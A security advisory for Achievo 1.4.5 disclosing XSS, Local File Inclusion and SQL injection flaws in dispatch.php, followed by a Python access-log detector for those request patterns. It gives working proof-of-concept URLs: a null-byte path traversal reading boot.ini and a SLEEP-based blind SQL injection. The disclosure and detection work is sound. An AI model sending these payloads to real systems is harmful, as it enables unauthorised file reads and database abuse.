XSS, LFI and SQL Injection Vulnerabilities in Achievo

Information

Advisory by Netsparker (now Invicti)
Name: XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software: Achievo 1.4.5 and possibly below.
Vendor Homepage: http://www.achievo.org
Vulnerability Type: Cross-Site Scripting, Local File Inclusion and SQL Injection
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference: NS-12-016

Description

Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities will enable organizations to support their business processes in a simple, but effective manner.

Details

Achievo is affected by XSS, LFI, and SQL Injection vulnerabilities in version 1.4.5.

  • XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString)
  • LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
  • SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
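
The three request patterns listed above can be recognised in web server access logs. The following Python detector is an added example, not part of the advisory or of Achievo: the log lines are constructed, the regular expressions are mine, and it assumes that a legitimate atknodetype value has the form module.node (as in employee.userprefs), so traversal sequences or a NUL byte in that parameter are flagged as LFI, SQL keywords in atkselector as blind SQL injection, and HTML or script markup in the parameters the advisory names as XSS.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory): one benign request, then one per vulnerability class.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2012:10:00:01 +0000] "GET /dispatch.php?atknodetype=employee.userprefs&atkaction=edit HTTP/1.1" 200 512
10.0.0.6 - - [01/Nov/2012:10:00:02 +0000] "GET /dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2fboot.ini%00.search&searchstring=3 HTTP/1.1" 200 98
10.0.0.7 - - [01/Nov/2012:10:00:03 +0000] "GET /dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A) HTTP/1.1" 200 77
10.0.0.8 - - [01/Nov/2012:10:00:04 +0000] "GET /dispatch.php?atkaction=view&atkselector=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Assumption: a legitimate atknodetype is "module.node"; traversal or a NUL byte in it is treated as LFI.
NODETYPE_RE = re.compile(r'^[A-Za-z0-9_]+\.[A-Za-z0-9_]+$')
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|\x00')
# Time-based blind SQLi in atkselector: SLEEP/BENCHMARK or a nested SELECT/UNION.
SQLI_RE = re.compile(r'\b(SLEEP|BENCHMARK|SELECT|UNION)\b', re.I)
# Reflected XSS markers in the parameters the advisory lists.
XSS_RE = re.compile(r'<\s*/?\s*(script|img|svg|iframe)\b|\bon\w+\s*=|javascript:', re.I)
XSS_PARAMS = {"atklevel", "atkaction", "atkstackid", "atkselector", "atkfilter", "searchstring"}

def classify_request(url):
    """Return [(class, parameter)] findings for one dispatch.php request URL."""
    parts = urlsplit(url)
    if not parts.path.endswith("/dispatch.php"):
        return []
    findings = []
    # parse_qs percent-decodes once, so %2f and %00 become "/" and "\x00".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        lname = name.lower()
        for value in values:
            if lname == "atknodetype" and (TRAVERSAL_RE.search(value) or not NODETYPE_RE.match(value)):
                findings.append(("LFI", name))
            if lname == "atkselector" and SQLI_RE.search(value):
                findings.append(("SQLi", name))
            if lname in XSS_PARAMS and XSS_RE.search(value):
                findings.append(("XSS", name))
    return findings

def scan_log(text):
    """Walk combined-format log lines; return [(client_ip, findings)] for hits only."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings = classify_request(m.group(1))
            if findings:
                hits.append((line.split()[0], findings))
    return hits
```

Running scan_log(SAMPLE_LOG) reports the second, third and fourth constructed lines as LFI, SQLi and XSS respectively and stays silent on the benign first one.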

Advisory Timeline

23/01/2011 – First contact
25/02/2012 – Second contact – No response
01/11/2012 – Advisory released

Credits

The vulnerabilities were discovered during testing with the Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.